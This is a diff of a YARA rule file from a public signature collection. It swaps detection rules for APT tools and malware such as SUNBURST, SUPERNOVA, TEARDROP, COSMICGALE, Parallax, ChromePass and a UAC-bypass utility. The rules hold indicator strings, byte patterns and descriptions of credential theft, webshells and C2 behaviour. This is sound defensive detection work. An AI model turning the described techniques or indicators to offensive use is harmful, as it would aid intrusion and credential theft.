 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "873cc02674e386577e86cb9b702265c25dd24b1f203741e8628e30c191dc99e0"
+		logic_hash = "6ae043ee5baa7361def79811350317baf54eb76cf15001a7785808dc7947fddc"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5264d1de687432f8346617ac88ffcb31e025e43fc3da1dad55882b17b44f1f8b"
 
 	strings:
-		$s1 = "RemoteCmd.exe" fullword wide
-		$s2 = "\\Release\\RemoteCmd.pdb" ascii
-		$s3 = "RemoteCmd [ComputerName] [Executable] [Param1] [Param2] ..." fullword wide
-		$s4 = "http://{0}:65101/CommandEngine" fullword wide
-		$s5 = "Brenner.RemoteCmd.Client" fullword ascii
-		$s6 = "$b1888995-1ee5-4f6d-82df-d2ab8ae73d63" fullword ascii
+		$s1 = "Users\\parviz\\documents\\" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 2 of them ) or ( 4 of them )
+		$s1
 }
-rule SIGNATURE_BASE_HKTL_Chromepass : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Ccproxy_Config
 {
 	meta:
-		description = "Detects a tool used by APT groups - file ChromePass.exe"
+		description = "CCProxy config known from Operation Cleaver"
 		author = "Florian Roth (Nextron Systems)"
-		id = "950b9761-bdfd-514b-90ea-a1454d35ce5a"
-		date = "2016-09-08"
-		modified = "2025-03-10"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_buckeye.yar#L53-L77"
+		id = "c4d80a2a-2a32-585e-bc20-1c5118e4ee48"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L334-L352"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bda90d2718be5cf9ddb95b88171c937c5fad5729aa1717a13a34a8b48dd1865c"
-		score = 75
+		logic_hash = "6e5c1c75a499434ad6ddd2439d28ac91d500b18418e693761d0b236bf6d6ce42"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5ff43049ae18d03dcc74f2be4a870c7056f6cfb5eb636734cca225140029de9a"
 
 	strings:
-		$x1 = "\\Release\\ChromePass.pdb" ascii
-		$x2 = "Windows Protect folder for getting the encryption keys" wide
-		$x3 = "Chrome User Data folder where the password file is stored" wide
-		$s1 = "Opera Software\\Opera Stable\\Login Data" fullword wide
-		$s2 = "Yandex\\YandexBrowser\\User Data\\Default\\Login Data" fullword wide
-		$s3 = "Load the passwords from another Windows user or external drive: " fullword wide
-		$s4 = "Windows Login Password:" fullword wide
-		$s5 = "SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created fr" ascii
-		$s6 = "Chrome Password Recovery" fullword wide
+		$s1 = "UserName=User-001" fullword ascii
+		$s2 = "Web=1" fullword ascii
+		$s3 = "Mail=1" fullword ascii
+		$s4 = "FTP=0" fullword ascii
+		$x1 = "IPAddressLow=78.109.194.114" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of ( $x* ) ) or ( 5 of them )
+		all of ( $s* ) or $x1
 }
 rule SIGNATURE_BASE_Waterbear_1_Jun17 : FILE
 {
@@ -325665,2551 +325467,3578 @@ rule SIGNATURE_BASE_Waterbear_14_Jun17 : FILE
 	condition:
 		( uint16( 0 ) == 0x5a4d and filesize < 8000KB and all of them )
 }
-rule SIGNATURE_BASE_APT_MAL_HP_Ilo_Firmware_Dec21_1 : FILE
+rule SIGNATURE_BASE_SUSP_VULN_DRV_PROCEXP152_May23 : FILE
 {
 	meta:
-		description = "Detects suspicios ELF files with sections as described in malicious iLO Board analysis by AmnPardaz in December 2021"
+		description = "Detects vulnerable process explorer driver (original file name: PROCEXP152.SYS), often used by attackers to elevate privileges (false positives are possible in cases in which old versions of process explorer are still present on the system)"
+		author = "Florian Roth"
+		id = "748eb390-f320-5045-bed2-24ae70471f43"
+		date = "2023-05-05"
+		modified = "2023-07-28"
+		reference = "https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor_inverse_matches.yar#L502-L520"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "d988bba837b91b2ad7f69be8765a948848bce21e2daa53af602f714758cda4d4"
+		score = 50
+		quality = 85
+		tags = "FILE"
+		hash1 = "cdfbe62ef515546f1728189260d0bdf77167063b6dbb77f1db6ed8b61145a2bc"
+
+	strings:
+		$a1 = "\\ProcExpDriver.pdb" ascii
+		$a2 = "\\Device\\PROCEXP152" wide fullword
+		$a3 = "procexp.Sys" wide fullword
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+rule SIGNATURE_BASE_APT_Backdoor_SUNBURST_1
+{
+	meta:
+		description = "This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions. The first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver names/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."
+		author = "FireEye"
+		id = "74b44844-5575-53d7-819b-ab1b2327a144"
+		date = "2020-12-14"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_sunburst.yar#L6-L27"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "1fc006dead2fd540717e00e468bf30f37bdb1d061a805e33683e4a77db7f9156"
+		score = 85
+		quality = 77
+		tags = ""
+
+	strings:
+		$cmd_regex_encoded = "U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA" wide
+		$cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }
+		$fake_orion_event_encoded = "U3ItS80rCaksSFWyUvIvyszPU9IBAA==" wide
+		$fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }
+		$fake_orion_eventmanager_encoded = "U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==" wide
+		$fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67 65 72 22 2C }
+		$fake_orion_message_encoded = "U/JNLS5OTE9VslKqNqhVAgA=" wide
+		$fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }
+		$fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }
+
+	condition:
+		$fnv_xor and ( $cmd_regex_encoded or $cmd_regex_plain ) or ( ( $fake_orion_event_encoded or $fake_orion_event_plain ) and ( $fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain ) and ( $fake_orion_message_encoded and $fake_orion_message_plain ) )
+}
+rule SIGNATURE_BASE_APT_Backdoor_SUNBURST_2
+{
+	meta:
+		description = "The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2 communications. This rule is looking for each branch of the code that checks for which HTTP method is being used. This is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally designed so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."
+		author = "FireEye"
+		id = "329071d5-c9c6-5ae1-a514-aea9f4037bac"
+		date = "2020-12-14"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_sunburst.yar#L28-L79"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "2bf0697b110bca88f712cbccaf0d2ba614d6093d6d9595659aefe088848d3826"
+		score = 85
+		quality = 83
+		tags = ""
+
+	strings:
+		$a = "0y3Kzy8BAA==" wide
+		$aa = "S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA" wide
+		$ab = "S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=" wide
+		$ac = "C88sSs1JLS4GAA==" wide
+		$ad = "C/UEAA==" wide
+		$ae = "C89MSU8tKQYA" wide
+		$af = "8wvwBQA=" wide
+		$ag = "cyzIz8nJBwA=" wide
+		$ah = "c87JL03xzc/LLMkvysxLBwA=" wide
+		$ai = "88tPSS0GAA==" wide
+		$aj = "C8vPKc1NLQYA" wide
+		$ak = "88wrSS1KS0xOLQYA" wide
+		$al = "c87PLcjPS80rKQYA" wide
+		$am = "Ky7PLNAvLUjRBwA=" wide
+		$an = "06vIzQEA" wide
+		$b = "0y3NyyxLLSpOzIlPTgQA" wide
+		$c = "001OBAA=" wide
+		$d = "0y0oysxNLKqMT04EAA==" wide
+		$e = "0y3JzE0tLknMLQAA" wide
+		$f = "003PyU9KzAEA" wide
+		$h = "0y1OTS4tSk1OBAA=" wide
+		$i = "K8jO1E8uytGvNqitNqytNqrVA/IA" wide
+		$j = "c8rPSQEA" wide
+		$k = "c8rPSfEsSczJTAYA" wide
+		$l = "c60oKUp0ys9JAQA=" wide
+		$m = "c60oKUp0ys9J8SxJzMlMBgA=" wide
+		$n = "8yxJzMlMBgA=" wide
+		$o = "88lMzygBAA==" wide
+		$p = "88lMzyjxLEnMyUwGAA==" wide
+		$q = "C0pNL81JLAIA" wide
+		$r = "C07NzXTKz0kBAA==" wide
+		$s = "C07NzXTKz0nxLEnMyUwGAA==" wide
+		$t = "yy9IzStOzCsGAA==" wide
+		$u = "y8svyQcA" wide
+		$v = "SytKTU3LzysBAA==" wide
+		$w = "C84vLUpOdc5PSQ0oygcA" wide
+		$x = "C84vLUpODU4tykwLKMoHAA==" wide
+		$y = "C84vLUpO9UjMC07MKwYA" wide
+		$z = "C84vLUpO9UjMC04tykwDAA==" wide
+
+	condition:
+		($a and $b and $c and $d and $e and $f and $h and $i ) or ( $j and $k and $l and $m and $n and $o and $p and $q and $r and $s and ( $aa or $ab ) ) or ( $t and $u and $v and $w and $x and $y and $z and ( $aa or $ab ) ) or ( $ac and $ad and $ae and $af and $ag and $ah and ( $am or $an ) ) or ( $ai and $aj and $ak and $al and ( $am or $an ) )
+}
+
+rule SIGNATURE_BASE_APT_Webshell_SUPERNOVA_1 : FILE
+{
+	meta:
+		description = "SUPERNOVA is a .NET web shell backdoor masquerading as a legitimate SolarWinds web service handler. SUPERNOVA inspects and responds to HTTP requests with the appropriate HTTP query strings, Cookies, and/or HTML form values (e.g. named codes, class, method, and args). This rule is looking for specific strings and attributes related to SUPERNOVA."
+		author = "FireEye"
+		id = "73a27fa2-a846-5f4b-8182-064ac06c71a8"
+		date = "2020-12-14"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_sunburst.yar#L80-L99"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "8471e6b3675e7e9ccfe5b81ab4c599668f2de528f3b179a675f50aa1fd7814b2"
+		score = 85
+		quality = 81
+		tags = "FILE"
+
+	strings:
+		$compile1 = "CompileAssemblyFromSource"
+		$compile2 = "CreateCompiler"
+		$context = "ProcessRequest"
+		$httpmodule = "IHttpHandler" ascii
+		$string1 = "clazz"
+		$string2 = "//NetPerfMon//images//NoLogo.gif" wide
+		$string3 = "SolarWinds" ascii nocase wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10KB and pe.imports ( "mscoree.dll" , "_CorDllMain" ) and $httpmodule and $context and all of ( $compile* ) and all of ( $string* )
+}
+rule SIGNATURE_BASE_APT_Webshell_SUPERNOVA_2 : FILE
+{
+	meta:
+		description = "This rule is looking for specific strings related to SUPERNOVA. SUPERNOVA is a .NET web shell backdoor masquerading as a legitimate SolarWinds web service handler. SUPERNOVA inspects and responds to HTTP requests with the appropriate HTTP query strings, Cookies, and/or HTML form values (e.g. named codes, class, method, and args)."
+		author = "FireEye"
+		id = "c39bf9ba-fd62-5619-92b6-1633375ef197"
+		date = "2020-12-14"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_sunburst.yar#L100-L118"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "96e344bd2ba3ee07784852db3e9935352762c2fa7b6be88f00cac10a90706ffc"
+		score = 85
+		quality = 83
+		tags = "FILE"
+
+	strings:
+		$dynamic = "DynamicRun"
+		$solar = "Solarwinds" nocase
+		$string1 = "codes"
+		$string2 = "clazz"
+		$string3 = "method"
+		$string4 = "args"
+
+	condition:
+		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10KB and 3 of ( $string* ) and $dynamic and $solar
+}
+rule SIGNATURE_BASE_APT_Hacktool_PS1_COSMICGALE_1
+{
+	meta:
+		description = "This rule detects various unique strings related to COSMICGALE. COSMICGALE is a credential theft and reconnaissance PowerShell script that collects credentials using the publicly available Get-PassHashes routine. COSMICGALE clears log files, writes acquired data to a hard coded path, and encrypts the file with a password."
+		author = "FireEye"
+		id = "c094943c-288e-5835-8066-8e95a992c76c"
+		date = "2020-12-14"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_sunburst.yar#L119-L140"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "c7b4d3c29d57b8db8d21e3a436c83617bc3fe14e66ccc1500b33a3774f09ee12"
+		score = 85
+		quality = 40
+		tags = ""
+
+	strings:
+		$sr1 = /\[byte\[\]\]@\([\x09\x20]{0,32}0xaa[\x09\x20]{0,32},[\x09\x20]{0,32}0xd3[\x09\x20]{0,32},[\x09\x20]{0,32}0xb4[\x09\x20]{0,32},[\x09\x20]{0,32}0x35[\x09\x20]{0,32},/ ascii nocase wide
+		$sr2 = /\[bitconverter\]::toint32\(\$\w{1,64}\[0x0c..0x0f\][\x09\x20]{0,32},[\x09\x20]{0,32}0\)[\x09\x20]{0,32}\+[\x09\x20]{0,32}0xcc\x3b/ ascii nocase wide
+		$sr3 = /\[byte\[\]\]\(\$\w{1,64}\.padright\(\d{1,2}\)\.substring\([\x09\x20]{0,32}0[\x09\x20]{0,32},[\x09\x20]{0,32}\d{1,2}\)\.tochararray\(\)\)/ ascii nocase wide
+		$ss1 = "[text.encoding]::ascii.getbytes(\"ntpassword\x600\");" ascii nocase wide
+		$ss2 = "system\\currentcontrolset\\control\\lsa\\$_" ascii nocase wide
+		$ss3 = "[security.cryptography.md5]::create()" ascii nocase wide
+		$ss4 = "[system.security.principal.windowsidentity]::getcurrent().name" ascii nocase wide
+		$ss5 = "out-file" ascii nocase wide
+		$ss6 = "convertto-securestring" ascii nocase wide
+
+	condition:
+		all of them
+}
+rule SIGNATURE_BASE_APT_Dropper_Raw64_TEARDROP_1
+{
+	meta:
+		description = "This rule looks for portions of the TEARDROP backdoor that are vital to how it functions. TEARDROP is a memory only dropper that can read files and registry keys, XOR decode an embedded payload, and load the payload into memory. TEARDROP persists as a Windows service and has been observed dropping Cobalt Strike BEACON into memory."
+		author = "FireEye"
+		id = "88adad58-ba16-5996-9ea8-ea356c3ed5b2"
+		date = "2020-12-14"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_sunburst.yar#L141-L156"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "6ab5197e7a1a123055b361a2ef79f8a77a7935606fccc8f163ea5914c94cd14d"
+		score = 85
+		quality = 85
+		tags = ""
+
+	strings:
+		$sb1 = { C7 44 24 ?? 80 00 00 00 [0-64] BA 00 00 00 80 [0-32] 48 8D 0D [4-32] FF 15 [4] 48 83 F8 FF [2-64] 41 B8 40 00 00 00 [0-64] FF 15 [4-5] 85 C0 7? ?? 80 3D [4] FF }
+		$sb2 = { 80 3D [4] D8 [2-32] 41 B8 04 00 00 00 [0-32] C7 44 24 ?? 4A 46 49 46 [0-32] E8 [4-5] 85 C0 [2-32] C6 05 [4] 6A C6 05 [4] 70 C6 05 [4] 65 C6 05 [4] 67 }
+		$sb3 = { BA [4] 48 89 ?? E8 [4] 41 B8 [4] 48 89 ?? 48 89 ?? E8 [4] 85 C0 7? [1-32] 8B 44 24 ?? 48 8B ?? 24 [1-16] 48 01 C8 [0-32] FF D0 }
+
+	condition:
+		all of them
+}
+rule SIGNATURE_BASE_APT_Dropper_Win64_TEARDROP_1 : FILE
+{
+	meta:
+		description = "This rule is intended match specific sequences of opcode found within TEARDROP, including those that decode the embedded payload. TEARDROP is a memory only dropper that can read files and registry keys, XOR decode an embedded payload, and load the payload into memory. TEARDROP persists as a Windows service and has been observed dropping Cobalt Strike BEACON into memory. (comment by Nextron: prone to False Positives)"
+		author = "FireEye"
+		id = "15dfdb74-5ca3-5bc6-be7a-730333b03ba5"
+		date = "2020-12-14"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_sunburst.yar#L157-L174"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "a1fa9b9c700601d10cb77ec714b972f04308de615dfc519f680fc956227cc11d"
+		score = 70
+		quality = 85
+		tags = "FILE"
+
+	strings:
+		$loc_4218FE24A5 = { 48 89 C8 45 0F B6 4C 0A 30 }
+		$loc_4218FE36CA = { 48 C1 E0 04 83 C3 01 48 01 E8 8B 48 28 8B 50 30 44 8B 40 2C 48 01 F1 4C 01 FA }
+		$loc_4218FE2747 = { C6 05 ?? ?? ?? ?? 6A C6 05 ?? ?? ?? ?? 70 C6 05 ?? ?? ?? ?? 65 C6 05 ?? ?? ?? ?? 67 }
+		$loc_5551D725A0 = { 48 89 C8 45 0F B6 4C 0A 30 48 89 CE 44 89 CF 48 F7 E3 48 C1 EA 05 48 8D 04 92 48 8D 04 42 48 C1 E0 04 48 29 C6 }
+		$loc_5551D726F6 = { 53 4F 46 54 57 41 52 45 ?? ?? ?? ?? 66 74 5C 43 ?? ?? ?? ?? 00 }
+
+	condition:
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+}
+rule SIGNATURE_BASE_Crime_Win32_Parallax_Loader_1 : FILE
+{
+	meta:
+		description = "Detects Parallax Loader"
+		author = "@VK_Intel"
+		id = "5e030b68-3c29-5203-bb4e-f01850bfbbab"
+		date = "2020-02-24"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/VK_Intel/status/1227976106227224578"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_parallax_rat.yar#L2-L18"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "1331e7b69fd9b14b5d2dae45b452b385e48018290d91de33a4f4a5ebcce4805b"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		hash1 = "829fce14ac8b9ad293076c16a1750502c6b303123c9bd0fb17c1772330577d65"
+
+	strings:
+		$main_call = { 68 81 85 50 00 e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8d ?? ?? ?? ?? ?? 51 ff ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 68 00 10 00 00 68 b0 a2 00 00 ff ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 68 8c e1 4f 00 ff ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 0c 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 03 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 68 40 84 50 00 8d ?? ?? ?? ?? ?? 51 e8 ?? ?? ?? ?? 83 c4 0c}
+		$decoder_call = { 55 8b ec 83 c4 f8 33 c0 89 ?? ?? 33 d2 89 ?? ?? 8b ?? ?? 3b ?? ?? 7d ?? 8b ?? ?? 8b ?? ?? 8b ?? ?? 8b ?? ?? 33 ?? ?? ?? ?? ?? ?? 8b ?? ?? 8b ?? ?? 89 ?? ?? 83 ?? ?? ?? 75 ?? 33 d2 89 ?? ?? eb ?? ff ?? ?? ff ?? ?? 8b ?? ?? 3b ?? ?? 7c ?? 59 59 5d c3}
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them
+}
+rule SIGNATURE_BASE_Crime_Win32_Parallax_Payload_1 : FILE
+{
+	meta:
+		description = "Detects Parallax Injected Payload v1.01"
+		author = "@VK_Intel"
+		id = "f3a23a28-e322-59ff-85e0-72e44def5c02"
+		date = "2020-02-24"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/VK_Intel/status/1227976106227224578"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_parallax_rat.yar#L20-L38"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "3a1718d7caea5bd6741dd39fc16f955e1d3c73a282d51eda5b63c3352404529e"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		hash1 = "20d0be64a0e0c2e96729143d41b334603f5d3af3838a458b0627af390ae33fbc"
+
+	strings:
+		$zwdelay_prologue = { 66 ?? ?? ?? 66 83 c1 01 66 ?? ?? ?? 50 b8 cb cb cb cb 89 ?? ?? ?? ?? ?? 58 8b ?? ?? ?? ?? ?? 89 ?? ?? 68 88 13 00 00 8b ?? ?? 8b ?? ?? 51 e8 ?? ?? ?? ??}
+		$wininet_call = { b8 77 00 00 00 66 ?? ?? ?? b9 69 00 00 00 66 ?? ?? ?? ba 6e 00 00 00 66 ?? ?? ?? b8 69 00 00 00 66 ?? ?? ?? b9 6e 00 00 00 66 ?? ?? ?? ba 65 00 00 00 66 ?? ?? ?? b8 74 00 00 00 66 ?? ?? ?? 33 c9 66 ?? ?? ?? 8d ?? ?? 52 8b ?? ?? 8b ?? ?? ff d1 89 ?? ?? 6a 00 68 0c fc e5 f2 8b ?? ?? 52 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 3d a8 16 da 8b ?? ?? 50 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 e0 05 65 01 8b ?? ?? 51 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 f5 98 c0 6c 8b ?? ?? 52 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 24 1d 19 e5 8b ?? ?? 50 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 a8 ed f2 ce 8b ?? ?? 8b ?? ?? 52 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 6a 00 ff ?? ?? 85 c0 75 ?? 68 88 13 00 00 ff ?? ?? eb ?? 6a 00 68 00 01 00 04 6a }
+		$rand_png_call = { b8 25 00 00 00 66 ?? ?? ?? ?? ?? ?? b9 78 00 00 00 66 ?? ?? ?? ?? ?? ?? ba 2e 00 00 00 66 ?? ?? ?? ?? ?? ?? b8 70 00 00 00 66 ?? ?? ?? ?? ?? ?? b9 6e 00 00 00 66 ?? ?? ?? ?? ?? ?? ba 67 00 00 00 66 ?? ?? ?? ?? ?? ?? 33 c0 66 ?? ?? ?? ?? ?? ?? 6a 64 6a 40 8b ?? ?? 8b ?? ?? ff d2 89 ?? ?? 8b ?? ?? 50 68 00 e1 f5 05 68 10 27 00 00 e8 ?? ?? ?? ??}
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+}
+rule SIGNATURE_BASE_Win7Elevatev2 : FILE
+{
+	meta:
+		description = "Detects Win7Elevate - Windows UAC bypass utility"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7f5fa905-07a3-55da-b644-c5ab882b4a9d"
-		date = "2021-12-28"
+		id = "af092d16-ca95-5985-822a-50457c9cbcc9"
+		date = "2015-05-14"
 		modified = "2023-12-05"
-		reference = "https://threats.amnpardaz.com/en/2021/12/28/implant-arm-ilobleed-a/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mal_ilo_board_elf.yar#L2-L18"
+		reference = "http://www.pretentiousname.com/misc/W7E_Source/Win7Elevate_Inject.cpp.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_uac_elevators.yar#L2-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7e959d07d864a485b8cc7765f9e12869ff34747ab552e26244eb28f510d1051f"
-		score = 80
+		logic_hash = "2f5859388c6074f1a75f0c40387f30ffa50d6b87f20f518fd1af7398c95cd650"
+		score = 60
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4f53ff6a04e46eda92b403faf42219a545c06c29"
+		hash2 = "808d04c187a524db402c5b2be17ce799d2654bd1"
 
 	strings:
-		$s1 = ".newelf.elf.text" ascii
-		$s2 = ".newelf.elf.libc.so.data" ascii
-		$s3 = ".newelf.elf.Initial.stack" ascii
-		$s4 = ".newelf.elf.libevlog.so.data" ascii
+		$x1 = "This program attempts to bypass Windows 7's default UAC settings to run " wide
+		$x2 = "Win7ElevateV2\\x64\\Release\\" ascii
+		$x3 = "Run the command normally (without code injection)" wide
+		$x4 = "Inject file copy && elevate command" fullword wide
+		$x5 = "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html" fullword wide
+		$x6 = "For injection, pick any unelevated Windows process with ASLR on:" fullword wide
+		$s1 = "\\cmd.exe" wide
+		$s2 = "runas" wide
+		$s3 = "explorer.exe" wide
+		$s4 = "Couldn't load kernel32.dll" wide
+		$s5 = "CRYPTBASE.dll" wide
+		$s6 = "shell32.dll" wide
+		$s7 = "ShellExecuteEx" ascii
+		$s8 = "COMCTL32.dll" ascii
+		$s9 = "ShellExecuteEx" ascii
+		$s10 = "HeapAlloc" ascii
 
 	condition:
-		filesize < 5MB and 2 of them or all of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Scanbox_Malware_Generic
+rule SIGNATURE_BASE_UACME_Akagi
 {
 	meta:
-		description = "Scanbox Chinese Deep Panda APT Malware http://goo.gl/MUUfjv and http://goo.gl/WXUQcP"
